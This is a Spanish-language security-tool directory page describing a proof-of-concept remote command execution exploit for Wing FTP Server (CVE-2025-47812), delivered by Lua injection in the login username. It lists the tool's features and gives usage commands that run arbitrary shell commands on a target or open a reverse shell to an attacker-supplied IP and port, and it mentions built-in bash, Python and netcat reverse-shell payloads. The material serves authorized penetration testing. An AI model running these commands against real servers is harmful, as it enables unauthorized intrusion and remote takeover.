Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WingFTP-CVE-2025-47812-illdeed — Exploit de ejecución remota de comandos para Wing FTP Server (CVE-2025-47812) | Kitploit
Herramientas/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Exploit de ejecución remota de comandos para Wing FTP Server (CVE-2025-47812)

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-47812 - Exploit RCE para Wing FTP Server

Este repositorio proporciona un exploit de prueba de concepto para CVE-2025-47812, una vulnerabilidad de ejecución remota de comandos (RCE) en Wing FTP Server. Un atacante puede inyectar y ejecutar comandos arbitrarios del sistema basados en Lua abusando del parámetro username durante la autenticación, lo que resulta en una ejecución remota de código completa.


📌 Características del Exploit

  • 🔧 Ejecución remota de comandos shell personalizados
  • 🧬 Múltiples payloads de reverse shell incorporados (bash, Python, netcat, etc.)
  • 🪪 Extracción automática de UID desde Set-Cookie
  • 📦 Registra UIDs exitosos en found_uids.txt
  • 🧪 Modo de prueba (no se envían solicitudes reales — pruebe su lógica de entrada/salida de forma segura)
  • 🔁 Lógica de reintento en caso de fallo de red
  • 🧹 Formateo de payload más limpio y salida legible
  • ✅ Validación de entrada para IPs, puertos y URLs
  • ⚙️ Soporte de argumentos de línea de comandos para flujos de trabajo automatizados

💻 Uso

Ejecutar un comando shell simple:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Activar un reverse shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Modo de prueba (no se enviarán solicitudes):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Cambios realizados al exploit original

Característica/MejoraDescripción
✅ Análisis de argumentosAñadido soporte CLI con argparse para modo no interactivo
🔐 Validación de entradaAsegura una URL/IP/puerto válidos antes de intentar el exploit
📦 Refactorización de cabecerasExtraídas las cabeceras HTTP en una función reutilizable para consistencia
📄 Registro de UIDGuarda tokens UID exitosos en found_uids.txt
🧪 Modo de pruebaPermite pruebas seguras sin enviar solicitudes (--dry-run)
🕒 Timeout + ReintentosAñade tiempo de espera y reintentos automáticos en caso de fallo
🧼 Legibilidad del payloadReformateada la cadena de inyección Lua para claridad y mantenimiento
📊 Salida estructuradaEnvueltas las respuestas del servidor y la información del payload con delimitadores para facilitar la lectura
⚠️ Comprobación de códigos de estadoAdvierte al usuario si el objetivo devuelve códigos de estado HTTP inesperados
📝 Sistema de registroReemplaza print() con el módulo logging de Python para un mejor control de la verbosidad

⚠️ Descargo de responsabilidad

Este proyecto está destinado únicamente a pruebas de seguridad educativas y autorizadas.
No use esta herramienta contra sistemas que no posea o para los que no tenga permiso explícito para probar.


Descargar herramienta